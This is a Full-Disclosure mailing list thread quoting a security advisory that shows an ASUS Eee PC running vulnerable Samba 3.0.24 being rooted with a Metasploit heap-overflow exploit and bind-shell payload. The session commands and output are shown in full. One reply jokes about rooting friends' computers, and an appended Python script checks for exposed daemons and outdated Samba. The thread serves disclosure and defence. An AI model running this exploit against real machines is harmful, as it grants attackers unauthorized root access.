Message-ID: <d8d979980802081315m6f193524y8ffb22ef00de0ff1@mail.gmail.com>
Date: Fri, 8 Feb 2008 16:15:58 -0500
From: "Erik Harrison" <eharrison@...il.com>
To: reepex <reepex@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: ASUS Eee PC rooted out of the box

Who cares? Of all the information posted on this list each and every day,
you choose this to whine about?

Is there no value in knowing that this particular system has a remote-root
exploit out of the box? I find this information more valuable than the
thousands of SQL injection advisories for tiny software apps which have only
ever been downloaded from SF 16 times. Chances are, this is more of a real
problem that I'm likely to encounter in my life.

The claim that this is 'media hyped' is a bit ridiculous. If this were
written for that audience, we probably wouldn't be reading raw process lists
or metasploit output. Though I would certainly enjoy seeing this republished
in some major newspaper tomorrow, if only to force/embarrass the vendor into
patching the default image for these machines when they're shipped - like
they should be doing anyway. Is there anything wrong with that?

So, thank you for posting this advisory. While technically it's no new
information, not a new exploit, I appreciate knowing that I can visit my
friends' homes and root their boxes while they order pizza wirelessly on
their couch.

On Feb 8, 2008 3:29 PM, reepex <reepex@...il.com> wrote:
> yes and no where in here includes 'make some media hyped report & blog crap
> for 5 minutes of fame'
>
> On Feb 8, 2008 2:27 PM, <keith@...uritynow.us> wrote:
> >
> > Security research should go as follows, run some type of scanner to find
> > known issues (low hanging fruit). Use your skill to manually try to find
> > threats then manually create an exploit then report the issue after
> > verified.
> >
> > -----Original Message-----
> > From: reepex <reepex@...il.com>
> > Sent: Friday, February 8, 2008 2:38pm
> > To: RISE Security <advisories@...esecurity.org>, full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box
> >
> > So you ran metasploit and then made a blog post. Is this what 'security
> > research' is considered now? And why did you write this in such a media
> > hyped way? Trying to get some spotlight?
> >
> > On Feb 8, 2008 10:47 AM, RISE Security <advisories@...esecurity.org> wrote:
> > >
> > > We recently acquired an ASUS Eee PC (if you want to know more about it,
> > > a lot of reviews are available on the internet). The first thing we did
> > > when we put our hands on the ASUS Eee PC was to test its security. The
> > > ASUS Eee PC comes with a customized version of the Xandros operating
> > > system installed, and some other bundled software like Mozilla Firefox,
> > > Pidgin, Skype and OpenOffice.org.
> > >
> > > Analysing the running processes of the ASUS Eee PC, the first thing that
> > > caught our attention was the running smbd process (the sshd daemon was
> > > started by us, and is not enabled by default).
> > >
> > > eeepc-rise:/root> ps -e
> > >   PID TTY          TIME CMD
> > >     1 ?        00:00:00 fastinit
> > >     2 ?        00:00:00 ksoftirqd/0
> > >     3 ?        00:00:00 events/0
> > >     4 ?        00:00:00 khelper
> > >     5 ?        00:00:00 kthread
> > >    25 ?        00:00:00 kblockd/0
> > >    26 ?        00:00:00 kacpid
> > >   128 ?        00:00:00 ata/0
> > >   129 ?        00:00:00 ata_aux
> > >   130 ?        00:00:00 kseriod
> > >   148 ?        00:00:00 pdflush
> > >   149 ?        00:00:00 pdflush
> > >   150 ?        00:00:00 kswapd0
> > >   151 ?        00:00:00 aio/0
> > >   152 ?        00:00:00 unionfs_siod/0
> > >   778 ?        00:00:00 scsi_eh_0
> > >   779 ?        00:00:00 scsi_eh_1
> > >   799 ?        00:00:00 kpsmoused
> > >   819 ?        00:00:00 kjournald
> > >   855 ?        00:00:00 fastinit
> > >   857 ?        00:00:00 sh
> > >   858 ?        00:00:00 su
> > >   859 tty3     00:00:00 getty
> > >   862 ?        00:00:00 startx
> > >   880 ?        00:00:00 xinit
> > >   881 tty2     00:00:06 Xorg
> > >   890 ?        00:00:00 udevd
> > >   952 ?        00:00:00 ksuspend_usbd
> > >   953 ?        00:00:00 khubd
> > >  1002 ?        00:00:00 acpid
> > >  1027 ?        00:00:00 pciehpd_event
> > >  1055 ?        00:00:00 ifplugd
> > >  1101 ?        00:00:00 scsi_eh_2
> > >  1102 ?        00:00:00 usb-storage
> > >  1151 ?        00:00:00 icewm
> > >  1185 ?        00:00:01 AsusLauncher
> > >  1186 ?        00:00:00 icewmtray
> > >  1188 ?        00:00:01 powermonitor
> > >  1190 ?        00:00:00 minimixer
> > >  1191 ?        00:00:00 networkmonitor
> > >  1192 ?        00:00:00 wapmonitor
> > >  1193 ?        00:00:00 x-session-manag
> > >  1195 ?        00:00:00 x-session-manag
> > >  1200 ?        00:00:00 x-session-manag
> > >  1201 ?        00:00:00 dispwatch
> > >  1217 ?        00:00:00 cupsd
> > >  1224 ?        00:00:00 usbstorageapple
> > >  1234 ?        00:00:00 kondemand/0
> > >  1240 ?        00:00:00 portmap
> > >  1248 ?        00:00:00 keyboardstatus
> > >  1272 ?        00:00:00 memd
> > >  1279 ?        00:00:00 scim-helper-man
> > >  1280 ?        00:00:00 scim-panel-gtk
> > >  1282 ?        00:00:00 scim-launcher
> > >  1297 ?        00:00:00 netserv
> > >  1331 ?        00:00:00 asusosd
> > >  1476 ?        00:00:00 xandrosncs-agen
> > >  1775 ?        00:00:00 dhclient3
> > >  2002 ?        00:00:00 nmbd
> > >  2004 ?        00:00:00 smbd
> > >  2005 ?        00:00:00 smbd
> > >  2322 ?        00:00:00 sshd
> > >  2345 ?        00:00:00 sshd
> > >  2356 pts/0    00:00:00 bash
> > >  2362 pts/0    00:00:00 ps
> > > eeepc-rise:/root>
> > >
> > > Retrieving the smbd version, we discovered that it runs a vulnerable
> > > version of Samba (Samba lsa_io_trans_names Heap Overflow), for which we
> > > published an exploit earlier last year.
> > >
> > > eeepc-rise:/root> smbd --version
> > > Version 3.0.24
> > > eeepc-rise:/root>
> > >
> > > With this information, we ran our exploit against the ASUS Eee PC using
> > > the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> > > Debian based).
> > >
> > > msf > use linux/samba/lsa_transnames_heap
> > > msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> > > RHOST => 192.168.50.10
> > > msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> > > PAYLOAD => linux/x86/shell_bind_tcp
> > > msf exploit(lsa_transnames_heap) > show targets
> > >
> > > Exploit targets:
> > >
> > >   Id  Name
> > >   --  ----
> > >   0   Linux vsyscall
> > >   1   Linux Heap Brute Force (Debian/Ubuntu)
> > >   2   Linux Heap Brute Force (Gentoo)
> > >   3   Linux Heap Brute Force (Mandriva)
> > >   4   Linux Heap Brute Force (RHEL/CentOS)
> > >   5   Linux Heap Brute Force (SUSE)
> > >   6   Linux Heap Brute Force (Slackware)
> > >   7   DEBUG
> > >
> > > msf exploit(lsa_transnames_heap) > set TARGET 1
> > > TARGET => 1
> > > msf exploit(lsa_transnames_heap) > exploit
> > > [*] Started bind handler
> > > [*] Creating nop sled....
> > > ...
> > > [*] Trying to exploit Samba with address 0x08415000...
> > > [*] Connecting to the SMB service...
> > > [*] Binding to
> > > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > > ...
> > > [*] Bound to
> > > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > > ...
> > > [*] Calling the vulnerable function...
> > > [+] Server did not respond, this is expected
> > > [*] Command shell session 1 opened (192.168.50.201:33694 ->
> > > 192.168.50.10:4444)
> > > msf exploit(lsa_transnames_heap) > sessions -i 1
> > > [*] Starting interaction with 1...
> > >
> > > uname -a
> > > Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> > > GNU/Linux
> > > id
> > > uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
> > >
> > > Easy to learn, Easy to work, Easy to root.
> > >
> > > The original blog post and more information can be found on our
> > > website at http://risesecurity.org/.
> > >
> > > Best regards,
> > > RISE Security

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
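A defender-side check, added here as an example and not part of the thread or of RISE Security's advisory: it parses the kind of `ps -e` and `smbd --version` output quoted above, reports which network-facing daemons are running by default, and compares the Samba version against the first release without the lsa_io_trans_names bug. The daemon list and the fixed-version threshold (3.0.25) are assumptions of this example; the sample inputs are constructed from the advisory's output.

```python
import re

# Daemons that accept network connections and deserve review when a consumer
# device ships with them running.  Assumed set, chosen from names that appear
# in the advisory's process list (sshd is included even though the authors
# started it by hand, since an audit cannot know that).
NETWORK_DAEMONS = {"smbd", "nmbd", "sshd", "portmap", "cupsd"}

# First Samba release without the lsa_io_trans_names heap overflow.  The
# advisory only states that 3.0.24 is vulnerable; 3.0.25 is this example's
# assumed cut-off.
SAMBA_FIXED_VERSION = (3, 0, 25)

# One `ps -e` row: PID, TTY, cumulative CPU time, command name.
PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\d\d:\d\d:\d\d)\s+(\S+)\s*$")


def find_network_daemons(ps_output):
    """Map each running network daemon name to the list of its PIDs."""
    found = {}
    for line in ps_output.splitlines():
        m = PS_LINE.match(line)
        if not m:          # header row or prompt echo, skip it
            continue
        pid, cmd = int(m.group(1)), m.group(4)
        if cmd in NETWORK_DAEMONS:
            found.setdefault(cmd, []).append(pid)
    return found


def parse_samba_version(version_output):
    """Extract the numeric version tuple from `smbd --version` output."""
    m = re.search(r"Version\s+(\d+(?:\.\d+)+)", version_output)
    if not m:
        raise ValueError("no Samba version string found")
    return tuple(int(part) for part in m.group(1).split("."))


def samba_is_vulnerable(version):
    """Tuple comparison handles 3.0.9 < 3.0.24 correctly, unlike strings."""
    return version < SAMBA_FIXED_VERSION


# Constructed sample inputs, trimmed from the output quoted in the advisory.
SAMPLE_PS = """  PID TTY          TIME CMD
    1 ?        00:00:00 fastinit
 1217 ?        00:00:00 cupsd
 1240 ?        00:00:00 portmap
 2002 ?        00:00:00 nmbd
 2004 ?        00:00:00 smbd
 2005 ?        00:00:00 smbd
 2322 ?        00:00:00 sshd
 2345 ?        00:00:00 sshd
 2356 pts/0    00:00:00 bash
"""
SAMPLE_VERSION = "Version 3.0.24\n"
```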